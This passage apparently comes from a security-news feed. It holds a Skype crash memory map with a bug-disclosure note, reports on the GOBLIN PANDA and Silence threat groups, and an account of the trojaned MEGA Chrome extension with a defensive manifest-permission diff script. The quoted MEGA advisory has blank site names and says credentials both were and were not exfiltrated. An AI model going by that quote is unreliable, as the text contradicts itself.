34efe4300000-34efe4380000 rw-p 00000000 00:00 0
355999380000-355999400000 rw-p 00000000 00:00 0
35c8d9680000-35c8d9685000 rw-p 00000000 00:00 0
36fd03c00000-36fd03c80000 rw-p 00000000 00:00 0
371ab4200000-371ab4280000 rw-p 00000000 00:00 0
37e430000000-37e430080000 rw-p 00000000 00:00 0
37f3b2f00000-37f3b2f80000 rw-p 00000000 00:00 0
389966a80000-389966b8a000 rw-p 00000000 00:00 0
3ad500400000-3ad500480000 rw-p 00000000 00:00 0
3aff91d80000-3aff91de2000 rw-p 00000000 00:00 0
3b2f0d680000-3b2f0d700000 rw-p 00000000 00:00 0
3fba22080000-3fba22100000 rw-p 00000000 00:00 0
7fb4bfffc000-7fb4c3ffd000 rw-s 00000000 00:1a 116 /dev/shm/pulse-shm-3506809168
7fb4c3ffd000-7fb4c7ffe000 rw-s 00000000 00:1a 115 /dev/shm/pulse-shm-136900218
7fb4c7ffe000-7fb4cbfff000 rw-s 00000000 00:1a 95 /dev/shm/pulse-shm-1835135660
7fb4cbfff000-7fb4d0000000 rw-s 00000000 00:1a 93 /dev/shm/pulse-shm-465478744
7fb4d0000000-7fb4d0029000 rw-p 00000000 00:00 0
7fb4d0029000-7fb4d4000000 ---p 00000000 00:00 0
7fb4d615e000-7fb4d615f000 ---p 00000000 00:00 0
7fb4d615f000-7fb4d695f000 rw-p 00000000 00:00 0
7fb4d695f000-7fb4d6960000 ---p 00000000 00:00 0
7fb4d6960000-7fb4d7160000 rw-p 00000000 00:00 0
7fb4d7160000-7fb4d7180000 rw-s 00000000 00:1a 195 /dev/shm/.org.chromium.Chromium.5U4VoF (deleted)
7fb4d7180000-7fb4d71c0000 rw-s 00000000 00:1a 194 /dev/shm/.org.chromium.Chromium.RLeLh9 (deleted)
7fb4d71c0000-7fb4d71e0000 rw-s 00000000 00:1a 185 /dev/shm/.org.chromium.Chromium.vuEDaD (deleted)
7fb4d71e0000-7fb4d7220000 rw-s 00000000 00:1a 124 /dev/shm/.org.chromium.Chromium.QXky36 (deleted)
7fb4d7260000-7fb4d72a0000 rw-s 00000000 00:1a 190 /dev/shm/.org.chromium.Chromium.iNwIs3 (deleted)
7fb4d72a0000-7fb4d72e0000 rw-s 00000000 00:1a 189 /dev/shm/.org.chromium.Chromium.TCc7Dx (deleted)
7fb4d7320000-7fb4d7340000 rw-s 00000000 00:1a 153 /dev/shm/.org.chromium.Chromium.niC6By (deleted)
7fb4d7340000-7fb4d7380000 rw-s 00000000 00:1a 184 /dev/shm/.org.chromium.Chromium.Bckk6z (deleted)
7fb4d7380000-7fb4d73c0000 rw-s 00000000 00:1a 183 /dev/shm/.org.chromium.Chromium.cjU5H8 (deleted)
7fb4d73c0000-7fb4d7400000 rw-s 00000000 00:1a 182 /dev/shm/.org.chromium.Chromium.T0uSjH (deleted)
7fb4d7400000-7fb4d7440000 rw-s 00000000 00:1a 181 /dev/shm/.org.chromium.Chromium.QW3FVf (deleted)
7fb4d7440000-7fb4d7480000 rw-s 00000000 00:1a 180 /dev/shm/.org.chromium.Chromium.VUxuxO (deleted)
7fb4d74c0000-7fb4d7500000 rw-s 00000000 00:1a 178 /dev/shm/.org.chromium.Chromium.HikaLV (deleted)
7fb4d7640000-7fb4d7680000 rw-s 00000000 00:1a 171 /dev/shm/.org.chromium.Chromium.4UVv2P (deleted)
7fb4d7680000-7fb4d76c0000 rw-s 00000000 00:1a 170 /dev/shm/.org.chromium.Chromium.BpeuEo (deleted)
7fb4d7700000-7fb4d7740000 rw-s 00000000 00:1a 168 /dev/shm/.org.chromium.Chromium.vB2tSv (deleted)
7fb4d7780000-7fb4d77c0000 rw-s 00000000 00:1a 166 /dev/shm/.org.chromium.Chromium.8lIy6C (deleted)
7fb4d7840000-7fb4d7880000 rw-s 00000000 00:1a 162 /dev/shm/.org.chromium.Chromium.aN74AR (deleted)
7fb4d7880000-7fb4d78c0000 rw-s 00000000 00:1a 161 /dev/shm/.org.chromium.Chromium.ExRifq (deleted)
7fb4d78c0000-7fb4d7900000 rw-s 00000000 00:1a 160 /dev/shm/.org.chromium.Chromium.O1MxTY (deleted)
7fb4d7940000-7fb4d7980000 rw-s 00000000 00:1a 158 /dev/shm/.org.chromium.Chromium.mxd5b6 (deleted)
7fb4d79c0000-7fb4d7a00000 rw-s 00000000 00:1a 156 /dev/shm/.org.chromium.Chromium.byaHud (deleted)
7fb4d7a40000-7fb4d7a80000 rw-s 00000000 00:1a 132 /dev/shm/.org.chromium.Chromium.2FEnNk (deleted)
7fb4d7ac0000-7fb4d7b00000 rw-s 00000000 00:1a 130 /dev/shm/.org.chromium.Chromium.HFba6r (deleted)
7fb4d7b00000-7fb4d7b40000 rw-s 00000000 00:1a 129 /dev/shm/.org.chromium.Chromium.tFrAK0 (deleted)
7fb4d7b40000-7fb4d7b80000 rw-s 00000000 00:1a 152 /dev/shm/.org.chromium.Chromium.4rXuc5 (deleted)
7fb4d7b80000-7fb4d7bc0000 rw-s 00000000 00:1a 151 /dev/shm/.org.chromium.Chromium.ei9cxE (deleted)
7fb4d7f40000-7fb4d7f80000 rw-s 00000000 00:1a 146 /dev/shm/.org.chromium.Chromium.hbGEFc (deleted)
7fb4d7fc0000-7fb4d8000000 rw-s 00000000 00:1a 144 /dev/shm/.org.chromium.Chromium.TaWipl (deleted)
7fb4d8000000-7fb4d803c000 rw-p 00000000 00:00 0
7fb4d803c000-7fb4dc000000 ---p 00000000 00:00 0
7fb4dc000000-7fb4dc021000 rw-p 00000000 00:00 0
7fb4dc021000-7fb4e0000000 ---p 00000000 00:00 0
7fb4e0000000-7fb4e0022000 rw-p 00000000 00:00 0
7fb4e0022000-7fb4e4000000 ---p 00000000 00:00 0
7fb4e4030000-7fb4e4094000 rw-s 00000000 00:1a 111 /dev/shm/.org.chromium.Chromium.7I5ZtW (deleted)
7fb4e4094000-7fb4e40f4000 rw-s 00000000 00:1a 100 /dev/shm/.org.chromium.Chromium.L6QAhS (deleted)
7fb4e40f4000-7fb4e4154000 rw-s 00000000 00:1a 91 /dev/shm/.org.chromium.Chromium.Sf8WzY (deleted)
7fb4e4154000-7fb4e4155000 ---p 00000000 00:00 0
7fb4e4155000-7fb4e4955000 rw-p 00000000 00:00 0
7fb4e4995000-7fb4e49d5000 rw-s 00000000 00:1a 137 /dev/shm/.org.chromium.Chromium.Hx0IZk (deleted)
7fb4e49d5000-7fb4e637d000 r-xp 00000000 08:01 26878205 /usr/lib/x86_64-linux-gnu/
7fb4e637d000-7fb4e657c000 ---p 019a8000 08:01 26878205 /usr/lib/x86_64-linux-gnu/
7fb4e657c000-7fb4e657d000 r--p 019a7000 08:01 26878205 /usr/lib/x86_64-linux-gnu/
7fb4e657d000-7fb4e657e000 rw-p 019a8000 08:01 26878205 /usr/lib/x86_64-linux-gnu/
7fb4e657e000-7fb4e6721000 r-xp 00000000 08:01 26878215 /usr/lib/x86_64-linux-gnu/
7fb4e6721000-7fb4e6920000 ---p 001a3000 08:01 26878215 /usr/lib/x86_64-linux-gnu/
7fb4e6920000-7fb4e6933000 r--p 001a2000 08:01 26878215 /usr/lib/x86_64-linux-gnu/
7fb4e6933000-7fb4e6934000 rw-p 001b5000 08:01 26878215 /usr/lib/x86_64-linux-gnu/
7fb4e6934000-7fb4e6935000 rw-p 00000000 00:00 0
7fb4e6935000-7fb4e6bc7000 r-xp 00000000 08:01 26878207 /usr/lib/x86_64-linux-gnu/
7fb4e6bc7000-7fb4e6dc6000 ---p 00292000 08:01 26878207 /usr/lib/x86_64-linux-gnu/
7fb4e6dc6000-7fb4e6dd5000 r--p 00291000 08:01 26878207 /usr/lib/x86_64-linux-gnu/
7fb4e6dd5000-7fb4e6dd6000 rw-p 002a0000 08:01 26878207 /usr/lib/x86_64-linux-gnu/
7fb4e6dd6000-7fb4e6e1b000 r-xp 00000000 08:01 27136130 /usr/lib/x86_64-linux-gnu/libunity/
7fb4e6e1b000-7fb4e701a000 ---p 00045000 08:01 27136130 /usr/lib/x86_64-linux-gnu/libunity/
7fb4e701a000-7fb4e701d000 r--p 00044000 08:01 27136130 /usr/lib/x86_64-linux-gnu/libunity/
7fb4e701d000-7fb4e701e000 rw-p 00047000 08:01 27136130 /usr/lib/x86_64-linux-gnu/libunity/
7fb4e701e000-7fb4e7057000 r-xp 00000000 08:01 26877853 /usr/lib/x86_64-linux-gnu/
7fb4e7057000-7fb4e7257000 ---p 00039000 08:01 26877853 /usr/lib/x86_64-linux-gnu/
7fb4e7257000-7fb4e7258000 r--p 00039000 08:01 26877853 /usr/lib/x86_64-linux-gnu/
7fb4e7258000-7fb4e7259000 rw-p 0003a000 08:01 26877853 /usr/lib/x86_64-linux-gnu/
7fb4e7259000-7fb4e72f6000 r-xp 00000000 08:01 26878675 /usr/lib/x86_64-linux-gnu/
7fb4e72f6000-7fb4e74f6000 ---p 0009d000 08:01 26878675 /usr/lib/x86_64-linux-gnu/
7fb4e74f6000-7fb4e74fa000 r--p 0009d000 08:01 26878675 /usr/lib/x86_64-linux-gnu/
7fb4e74fa000-7fb4e74fc000 rw-p 000a1000 08:01 26878675 /usr/lib/x86_64-linux-gnu/
7fb4e74fc000-7fb4e74fd000 rw-p 00000000 00:00 0
7fb4e74fd000-7fb4e74fe000 ---p 00000000 00:00 0
7fb4e74fe000-7fb4e7cfe000 rw-p 00000000 00:00 0
7fb4e7cfe000-7fb4e7dc3000 r-xp 00000000 07:15 15069 /snap/skype/51/usr/share/skypeforlinux/resources/app.asar.unpacked/node_modules/electron-ssid/build/Release/electron-ssid.node
7fb4e7dc3000-7fb4e7fc2000 ---p 000c5000 07:15 15069 /snap/skype/51/usr/share/skypeforlinux/resources/app.asar.unpacked/node_modules/electron-ssid/build/Release/electron-ssid.node
7fb4e7fc2000-7fb4e7fcb000 rw-p 000c4000 07:15 15069 /snap/skype/51/usr/share/skypeforlinux/resources/app.asar.unpacked/node_modules/electron-ssid/build/Release/electron-ssid.node
7fb4e7fcb000-7fb4e7fdf000 rw-p 00000000 00:00 0
7fb4e7fdf000-7fb4e7fff000 rw-p 00101000 07:15 15069 /snap/skype/51/usr/share/skypeforlinux/resources/app.asar.unpacked/node_modules/electron-ssid/build/Release/electron-ssid.node
7fb4e7fff000-7fb4ec000000 rw-s 00000000 00:1a 12 /dev/shm/pulse-shm-2958556533
7fb4ec000000-7fb4ec021000 rw-p 00000000 00:00 0
7fb4ec021000-7fb4f0000000 ---p 00000000 00:00 0
7fb4f002d000-7fb4f0091000 rw-s 00000000 00:1a 90 /dev/shm/.org.chromium.Chromium.JPBrMl (deleted)
7fb4f0091000-7fb4f00d1000 rw-s 00000000 00:1a 134 /dev/shm/.org.chromium.Chromium.ctJK62 (deleted)
7fb4f00f1000-7fb4f0151000 rw-s 00000000 00:1a 89 /dev/shm/.org.chromium.Chromium.kfsXYI (deleted)
7fb4f0151000-7fb4f01d2000 rw-s 00000000 08:01 1838001 /home/input0/snap/skype/common/.config/skypeforlinux/Cache/index
7fb4f01d2000-7fb4f01d3000 ---p 00000000 00:00 0
7fb4f01d3000-7fb4f09d3000 rw-p 00000000 00:00 0
7fb4f09d3000-7fb4f0a1f000 r-xp 00000000 07:15 484 /snap/skype/51/usr/lib/x86_64-linux-gnu/
7fb4f0a1f000-7fb4f0c1e000 ---p 0004c000 07:15 484 /snap/skype/51/usr/lib/x86_64-linux-gnu/
7fb4f0c1e000-7fb4f0c21000 r--p 0004b000 07:15 484 /snap/skype/51/usr/lib/x86_64-linux-gnu/
7fb4f0c21000-7fb4f0c22000 rw-p 0004e000 07:15 484 /snap/skype/51/usr/lib/x86_64-linux-gnu/
7fb4f0c22000-7fb4f0c26000 rw-p 00050000 07:15 484 /snap/skype/51/usr/lib/x86_64-linux-gnu/
7fb4f0c26000-7fb4f0cba000 r-xp 00000000 07:15 15077 /snap/skype/51/usr/share/skypeforlinux/resources/app.asar.unpacked/node_modules/keytar/build/Release/keytar.node
7fb4f0cba000-7fb4f0eb9000 ---p 00094000 07:15 15077 /snap/skype/51/usr/share/skypeforlinux/resources/app.asar.unpacked/node_modules/keytar/build/Release/keytar.node
7fb4f0eb9000-7fb4f0ec0000 rw-p 00093000 07:15 15077 /snap/skype/51/usr/share/skypeforlinux/resources/app.asar.unpacked/node_modules/keytar/build/Release/keytar.node
7fb4f0ec0000-7fb4f0ed3000 rw-p 00000000 00:00 0
7fb4f0ed3000-7fb4f0eea000 rw-p 000c1000 07:15 15077 /snap/skype/51/usr/share/skypeforlinux/resources/app.asar.unpacked/node_modules/keytar/build/Release/keytar.node
7fb4f0eea000-7fb4f12eb000 rw-s 00000000 00:1a 112 /dev/shm/.org.chromium.Chromium.8b0GDI (deleted)
7fb4f12eb000-7fb4f132b000 rw-s 00000000 00:1a 110 /dev/shm/.org.chromium.Chromium.wo010t (deleted)
7fb4f136b000-7fb4f13ab000 rw-s 00000000 00:1a 108 /dev/shm/.org.chromium.Chromium.4MWzbK (deleted)
7fb4f13ab000-7fb4f13eb000 rw-s 00000000 00:1a 107 /dev/shm/.org.chromium.Chromium.PCNSgn (deleted)
7fb4f13eb000-7fb4f142b000 rw-s 00000000 00:1a 106 /dev/shm/.org.chromium.Chromium.UUZcm0 (deleted)
7fb4f146b000-7fb4f14ab000 rw-s 00000000 00:1a 104 /dev/shm/.org.chromium.Chromium.MzjVwg (deleted)
7fb4f14bb000-7fb4f14cb000 rw-s 00000000 00:1a 118 /dev/shm/.org.chromium.Chromium.GgMWqU (deleted)
7fb4f14cb000-7fb4f14eb000 rw-s 00000000 00:1a 109 /dev/shm/.org.chromium.Chromium.CbpRGw (deleted)
7fb4f14eb000-7fb4f152b000 rw-s 00000000 00:1a 38 /dev/shm/.org.chromium.Chromium.keWIHw (deleted)
7fb4f152b000-7fb4f156b000 rw-s 00000000 00:1a 102 /dev/shm/.org.chromium.Chromium.9HJ9M9 (deleted)
7fb4f1577000-7fb4f1587000 rw-s 00000000 00:1a 113 /dev/shm/.org.chromium.Chromium.UPK1Ee (deleted)
7fb4f1587000-7fb4f15eb000 rw-s 00000000 00:1a 34 /dev/shm/.org.chromium.Chromium.leYub6 (deleted)
7fb4f15eb000-7fb4f162b000 rw-s 00000000 00:1a 97 /dev/shm/.org.chromium.Chromium.6IeB32 (deleted)
7fb4f162b000-7fb4f1a2c000 rw-s 00000000 00:1a 85 /dev/shm/.org.chromium.Chromium.6d3WFD (deleted)
7fb4f1a2c000-7fb4f1a6c000 rw-s 00000000 00:1a 83 /dev/shm/.org.chromium.Chromium.IjR5gj (deleted)
7fb4f1a6c000-7fb4f1aac000 rw-s 00000000 00:1a 88 /dev/shm/.org.chromium.Chromium.cG4AwK (deleted)
7fb4f1aac000-7fb4f1aec000 rw-s 00000000 00:1a 77 /dev/shm/.org.chromium.Chromium.StnttE (deleted)
7fb4f1aec000-7fb4f1b2c000 rw-s 00000000 00:1a 71 /dev/shm/.org.chromium.Chromium.xRFG4j (deleted)
7fb4f1b2c000-7fb4f1b2d000 ---p 00000000 00:00 0
7fb4f1b2d000-7fb4f25f5000 rw-p 00000000 00:00 0
7fb4f25f5000-7fb4f25f6000 ---p 00000000 00:00 0
7fb4f25f6000-7fb4f2df6000 rw-p 00000000 00:00 0
7fb4f2df6000-7fb4f2dfb000 r-xp 00000000 07:0b 2287 /snap/core/5328/lib/x86_64-linux-gnu/
7fb4f2dfb000-7fb4f2ffb000 ---p 00005000 07:0b 2287 /snap/core/5328/lib/x86_64-linux-gnu/
7fb4f2ffb000-7fb4f2ffc000 r--p 00005000 07:0b 2287 /snap/core/5328/lib/x86_64-linux-gnu/
7fb4f2ffc000-7fb4f2ffd000 rw-p 00006000 07:0b 2287 /snap/core/5328/lib/x86_64-linux-gnu/
7fb4f2ffd000-7fb4f2ffe000 ---p 00000000 00:00 0
7fb4f2ffe000-7fb4f37fe000 rw-p 00000000 00:00 0
7fb4f37fe000-7fb4f37ff000 ---p 00000000 00:00 0
7fb4f37ff000-7fb4f3fff000 rw-p 00000000 00:00 0
7fb4f3fff000-7fb4f8000000 rw-s 00000000 00:1a 7 /dev/shm/pulse-shm-796608596
7fb4f8000000-7fb4f8083000 rw-p 00000000 00:00 0
7fb4f8083000-7fb4fc000000 ---p 00000000 00:00 0
7fb4fc000000-7fb4fc021000 rw-p 00000000 00:00 0
7fb4fc021000-7fb500000000 ---p 00000000 00:00 0
7fb500000000-7fb500021000 rw-p 00000000 00:00 0
7fb500021000-7fb504000000 ---p 00000000 00:00 0
7fb504000000-7fb504021000 rw-p 00000000 00:00 0
7fb504021000-7fb508000000 ---p 00000000 00:00 0
7fb508000000-7fb508021000 rw-p 00000000 00:00 0
7fb508021000-7fb50c000000 ---p 00000000 00:00 0
7fb50c000000-7fb50c30a000 rw-p 00000000 00:00 0
7fb50c30a000-7fb510000000 ---p 00000000 00:00 0
7fb510000000-7fb510028000 rw-p 00000000 00:00 0
7fb510028000-7fb514000000 ---p 00000000 00:00 0
7fb514000000-7fb514008000 rw-s 00000000 00:1a 187 /dev/shm/.org.chromium.Chromium.wp000v (deleted)
7fb514008000-7fb514048000 rw-s 00000000 00:1a 68 /dev/shm/.org.chromium.Chromium.kV2UFZ (deleted)
7fb514048000-7fb514088000 rw-s 00000000 00:1a 87 /dev/shm/.org.chromium.Chromium.JUxFl8 (deleted)
7fb514088000-7fb5140c8000 rw-s 00000000 00:1a 65 /dev/shm/.org.chromium.Chromium.476qSk (deleted)
7fb5140c8000-7fb514108000 rw-s 00000000 00:1a 96 /dev/shm/.org.chromium.Chromium.1d878F (deleted)
7fb514108000-7fb514148000 rw-s 00000000 00:1a 86 /dev/shm/.org.chromium.Chromium.IHmLaw (deleted)
7fb514148000-7fb51414a000 r-xp 00000000 08:01 8917743 /lib/x86_64-linux-gnu/
7fb51414a000-7fb514349000 ---p 00002000 08:01 8917743 /lib/x86_64-linux-gnu/libnss_mdns4_mini
Cool, so when I read the backtrace, I understood that this might be a memory corruption in `malloc()`.

So basically, the memory allocator allocates pages of memory at once for use by programs and gives you a pointer within them. The file which I was trying to share may have been too large for Skype to handle during the call (PS: I was just sharing a JPG file in this case, which was 800 kB). But if a larger program is allocating larger amounts of memory and writing past the end of its allocated space, then it ends up attempting to write into unallocated memory, which may cause memory corruption.

Being a fan of responsible disclosure, I submitted this to Microsoft on 8 August 2018, but MS said: “Upon investigation, we have determined that this submission does not meet the bar for security servicing” 🤦

Okay, but I passed this message on to the Skype team on Twitter, and they looked into it!

At last, this was patched in the Skype version on Linux.

CrowdStrike uncovered a new campaign of GOBLIN PANDA APT aimed at Vietnam
6.9.2018 securityaffairs APT

Researchers from security firm CrowdStrike have uncovered a new campaign associated with the GOBLIN PANDA APT group.

The group, also known as Cycldek, was first spotted in September 2013; it mainly targeted entities in Southeast Asia using several malware variants, chiefly PlugX and HttpTunnel.

In 2014, experts noticed an intensification in the activity of the group that appeared interested in the dispute over the South China Sea.

GOBLIN PANDA was focused on Vietnam, most of the targets were in the defense, energy, and government sectors.

The group is back and is once again targeting Vietnam with a spear phishing campaign that uses weaponized documents featuring Vietnamese-language lures and themes.

“Last month, CrowdStrike Intelligence observed renewed activity from GOBLIN PANDA targeting Vietnam. As part of this campaign, new exploit documents were identified with Vietnamese-language lures and themes, as well as Vietnam-themed, adversary-controlled infrastructure.” reads the analysis published by CrowdStrike.

“Two exploit documents with Vietnamese-language file names were observed with file metadata unique to the GOBLIN PANDA adversary.”

The researchers analyzed two weaponized Vietnamese-language documents and attributed them to GOBLIN PANDA based on their metadata.

The decoy documents have training-related themes and exploit the Office vulnerability CVE-2012-0158 to deliver a malware implant tracked as QCRat by CrowdStrike Falcon Intelligence.

The documents do not specifically reference projects related to the Vietnamese government or its departments, but they could be used to trick Government of Vietnam personnel into opening them.

According to CrowdStrike, the decoy documents use a previously identified legitimate executable, a side-loaded implant Dynamic Link Library (DLL), and a new implant configuration file stored with a .tlb extension.

The analysis of command and control servers suggests that GOBLIN PANDA hackers are also targeting entities in Laos.

“Analysis of command and control infrastructure suggests that GOBLIN PANDA is targeting entities in Laos, as well. CrowdStrike Intelligence has not directly observed Laotian targeting, and cannot confirm targets in Laos for this campaign, however, previous activity linked to GOBLIN PANDA has targeted this country.” concludes the report.

“Given major economic initiatives by China, such as the Belt and Road Initiative and continued dispute over the Paracel Islands, it is unlikely that GOBLIN PANDA will abandon efforts to collect intelligence from South East Asian neighbors and businesses operating in that region.”

Group-IB Uncovers APT Attacks on Banks: The Sound of Silence
6.9.2018 securityaffairs APT

Researchers at security firm Group-IB have exposed the attacks carried out by the Silence cybercriminal group, providing details on its tactics and tools.
Experts at security firm Group-IB have exposed the attacks committed by the Silence cybercriminal group. While the gang had previously targeted Russian banks, Group-IB experts have also discovered evidence of the group’s activity in more than 25 countries worldwide.

Group-IB has published its first detailed report “Silence: Moving into the darkside” on tactics and tools employed by the cybercriminals. Group-IB security analysts’ hypothesis is that at least one of the gang members appears to be a former or current employee of a cyber security company. The confirmed damage from Silence activity is estimated at 800 000 USD.

After the activity of the Cobalt group declined, Silence became one of the major threats to Russian and international banks. Once known only to cybersecurity specialists, Silence is an example of a mobile, small, and young group that has been progressing rapidly. Confirmed thefts by Silence increased more than fivefold, from just 100 000 USD in 2017 to 550 000 USD in less than a year. The current confirmed total from Silence attacks stands at 800 000 USD.

For more than two years, there was not a single sign of Silence that would enable researchers to identify them as an independent cybercrime group. The timeline and nature of the attacks identified by Group-IB forensic specialists strongly suggested that the first attacks were very amateur in nature and that the criminals were learning as they went along. Since autumn 2017, the group has become more active. Based on analysis and comparison with other incidents and financial APT timelines, it is clear that Silence studies the methods of other criminal groups and applies new tactics and tools to various banking systems: AWS CBR (Automated Work Station Client of the Russian Central Bank), ATMs, and card processing.

Group-IB incident response and intelligence teams detected Silence’s activity for the very first time in 2016. Silence members attempted to withdraw money via AWS CBR; however, due to errors in the payment orders, the theft was prevented. In 2017, Silence began to conduct attacks on ATMs. The first incident confirmed by Group-IB revealed that gang members stole 100 000 USD from ATMs in just one night. In 2018, they targeted card processing using a supply-chain attack, picking up 550 000 USD via ATMs of the bank’s counterpart over one weekend. In April 2018, two months after they successfully targeted card processing, the group decided to leverage its previous scheme and stole roughly 150 000 USD through ATMs. The attacks described above can be unequivocally attributed to Silence, but Group-IB security experts believe that there have been other successful attacks on banks.

Who are Silence?

Group-IB experts concluded that Silence is a group of Russian-speaking hackers, based on the language of their commands, the location of the infrastructure they used, and the geography of their targets (Russia, Ukraine, Belarus, Azerbaijan, Poland, and Kazakhstan), although phishing emails were also sent to bank employees in Central and Western Europe, Africa, and Asia. Furthermore, Silence used Russian words typed on an English keyboard layout for the commands of the backdoor it employed. The hackers also used Russian-language web hosting services.

There appear to be just two members in Silence: a developer and an operator. This explains why they are so selective in their targets, and why it takes them so long (up to three months, at least three times longer than Anunak, Buhtrap, MoneyTaker and Cobalt) to commit a theft. One member, the developer, has the skills of a highly experienced reverse engineer. He develops the tools used in the attacks and modifies complex exploits and software. However, his code contains a number of errors that are quite common among virus analysts and reverse engineers: he knows exactly how to develop software, but he does not know how to program properly. The second member is an operator. He has experience in penetration testing, which means he can easily find his way around banking infrastructure. He is the one who uses the developed tools to access banking systems and initiates the theft process.

Silence’s tools and methods

Like most cybercrime groups, Silence uses phishing emails. Initially, the group used hacked servers and compromised accounts for its campaigns. Later on, the criminals began to register phishing domains, for which they created self-signed certificates. Silence designs very well-crafted phishing emails usually purporting to be from bank employees. To conduct their phishing campaigns, the hackers rent servers in Russia and the Netherlands. Silence also uses Ukraine-based hosting services to rent servers to use as C&C servers. A number of servers were rented at MaxiDed, whose infrastructure was blocked by Europol in May 2018.

In their first operations, Silence used a borrowed backdoor, Kikothac, which makes it clear that the group began its activity without any preparation; these were attempts to test the waters. Later, the group’s developer created a unique set of tools for attacks on card processing and ATMs, including Silence (a framework for infrastructure attacks), Atmosphere (a set of software tools for attacks on ATMs), Farse (a tool to obtain passwords from a compromised computer), and Cleaner (a tool for log removal).

“Silence, in many ways, is changing the perception of cybercrime in terms of the nature of the attacks, the tools, tactics, and even the members of the group. It is obvious that the criminals responsible for these crimes were at some point active in the security community. Either as penetration testers or reverse engineers,” says Dmitry Volkov, Chief Technology Officer and Head of Threat Intelligence at Group-IB.

“They carefully study the attacks conducted by other cybercriminal groups, and analyse antivirus and Threat Intelligence reports. However, it does not save them from making mistakes; they learn as they go. Many of Silence’s tools are legitimate, others they developed themselves and learn from other gangs. After having studied Silence’s attacks, we concluded that they are most likely white hats evolving into black hats. The Internet, particularly the underground web, favours this kind of transformation; it is far easier now to become a cybercriminal than 5–7 years ago—you can rent servers, modify existing exploits, and use legal tools. It makes things more complicated for blue teams and much easier for hackers”.

MEGA Chrome browser extension hacked, bogus version stole users’ credentials
6.9.2018 securityaffairs Incident

The MEGA Chrome browser extension was hacked and replaced with one that steals users’ credentials for popular web services.
Are you using the MEGA Chrome browser extension? Uninstall it now: the Chrome extension for the MEGA file storage service was hacked and replaced with one that steals users’ credentials for popular web services (Amazon, Microsoft, GitHub, and Google) and private keys for cryptocurrency wallets (MyEtherWallet and MyMonero) and a cryptocurrency trading platform.

According to Mega, on 4 September at 14:30 UTC an attacker compromised the company’s Google Chrome Web Store account and uploaded a malicious version, 3.39.4, of the extension.

“On 4 September 2018 at 14:30 UTC, an unknown attacker uploaded a trojaned version of MEGA’s Chrome extension, version 3.39.4, to the Google Chrome webstore.” reads the security advisory published by Mega.

“Upon installation or autoupdate, it would ask for elevated permissions (Read and change all your data on the websites you visit) that MEGA’s real extension does not require and would (if permissions were granted) exfiltrate credentials for sites including,,, (for webstore login),,, and HTTP POST requests to other sites, to a server located in Ukraine. Note that credentials were not being exfiltrated.”

Once installed, or after an auto-update, the malicious MEGA Chrome extension asked for elevated permissions, used them to harvest the sensitive data, and sent it to a server controlled by the attackers and located in Ukraine (megaopac[.]host).

Four hours after the breach, Mega uploaded a clean version (3.39.5) to the store, and affected installations were auto-updated. Google removed the malicious extension from the Chrome Web Store five hours after the breach.

“You are only affected if you had the MEGA Chrome extension installed at the time of the incident, autoupdate enabled, and you accepted the additional permission, or if you freshly installed version 3.39.4,” continues the advisory.
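One check a practitioner can run before accepting an extension update is to diff the manifest permissions between the installed version and the one the store is pushing: the trojaned build described above could only read other sites’ traffic because it asked for a host permission (“Read and change all your data on the websites you visit”) that the real extension never had. The script below is an added example, not MEGA’s code or anything from the advisory; the two manifests are constructed stand-ins (only the version strings mirror the advisory), and the sets of broad host patterns and sensitive API permissions are the editor’s choices, not Chrome’s full lists.

```python
"""Flag an extension update that asks for broader permissions than the
version it replaces (added example; manifests are constructed stand-ins,
not MEGA's real manifest.json)."""
import json

# Host patterns that trigger Chrome's "Read and change all your data on the
# websites you visit" warning; a content script matched on them sees every page.
BROAD_HOST_PATTERNS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

# API permissions that let an extension observe or rewrite other sites'
# requests and state (illustrative selection, not Chrome's full list).
SENSITIVE_PERMISSIONS = {"webRequest", "webRequestBlocking", "cookies", "tabs",
                         "history", "clipboardRead", "nativeMessaging", "debugger"}


def host_patterns(manifest):
    """Every host pattern the manifest claims: in 'permissions' (MV2),
    'host_permissions' (MV3) and content_scripts[].matches."""
    hosts = {p for p in manifest.get("permissions", [])
             if "://" in p or p == "<all_urls>"}
    hosts.update(manifest.get("host_permissions", []))
    for script in manifest.get("content_scripts", []):
        hosts.update(script.get("matches", []))
    return hosts


def permission_escalation(old_manifest, new_manifest):
    """Compare two manifests and report what the new one gained."""
    added_api = (set(new_manifest.get("permissions", []))
                 - set(old_manifest.get("permissions", [])))
    added_hosts = host_patterns(new_manifest) - host_patterns(old_manifest)
    report = {
        "version": f"{old_manifest.get('version')} -> {new_manifest.get('version')}",
        "new_broad_hosts": sorted(h for h in added_hosts if h in BROAD_HOST_PATTERNS),
        "new_sensitive_api": sorted(p for p in added_api if p in SENSITIVE_PERMISSIONS),
        "other_added": sorted((added_api | added_hosts)
                              - BROAD_HOST_PATTERNS - SENSITIVE_PERMISSIONS),
    }
    # An update that crosses either line deserves a human look before it is accepted.
    report["escalates"] = bool(report["new_broad_hosts"] or report["new_sensitive_api"])
    return report


# Constructed sample manifests: a storage extension scoped to its own site, and
# an "update" that adds all-sites access plus request interception.
CLEAN_MANIFEST = json.loads("""
{
  "name": "Example Storage Extension", "version": "3.39.3", "manifest_version": 2,
  "permissions": ["storage", "unlimitedStorage", "*://*.example.com/*"],
  "content_scripts": [{"matches": ["*://*.example.com/*"], "js": ["content.js"]}]
}""")

TROJANED_MANIFEST = json.loads("""
{
  "name": "Example Storage Extension", "version": "3.39.4", "manifest_version": 2,
  "permissions": ["storage", "unlimitedStorage", "*://*.example.com/*",
                  "<all_urls>", "webRequest", "webRequestBlocking"],
  "content_scripts": [{"matches": ["<all_urls>"], "js": ["content.js"]}]
}""")


if __name__ == "__main__":
    print(json.dumps(permission_escalation(CLEAN_MANIFEST, TROJANED_MANIFEST), indent=2))
```

The same diff applies to the unpacked CRX of any extension an organisation allow-lists through browser policy: a version whose report says `escalates` should be held back until someone has read the new code, regardless of what the store's automatic signing vouches for.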

Mega pointed out that Google no longer allows publishers to sign their own Chrome extensions and relies solely on signing them automatically once they are uploaded, which leaves the door open to similar compromises.

The Italian security researcher who handles the Twitter account @serhack_ first reported the breach on both Reddit and Twitter.



SerHack (@serhack_) on Twitter, 7:16 PM - Sep 4, 2018:

Version: 3.39.4

It catches your username and password from Amazon, GitHub, Google, Microsoft portals!! It could catch #mega #extension #hacked @x0rz
At the time of writing it is not clear how many users installed the malicious MEGA Chrome browser extension; experts speculate that tens of millions of users may have been affected.

The Firefox version of the MEGA extension was not compromised, and users accessing MEGA without the Chrome extension were not affected.

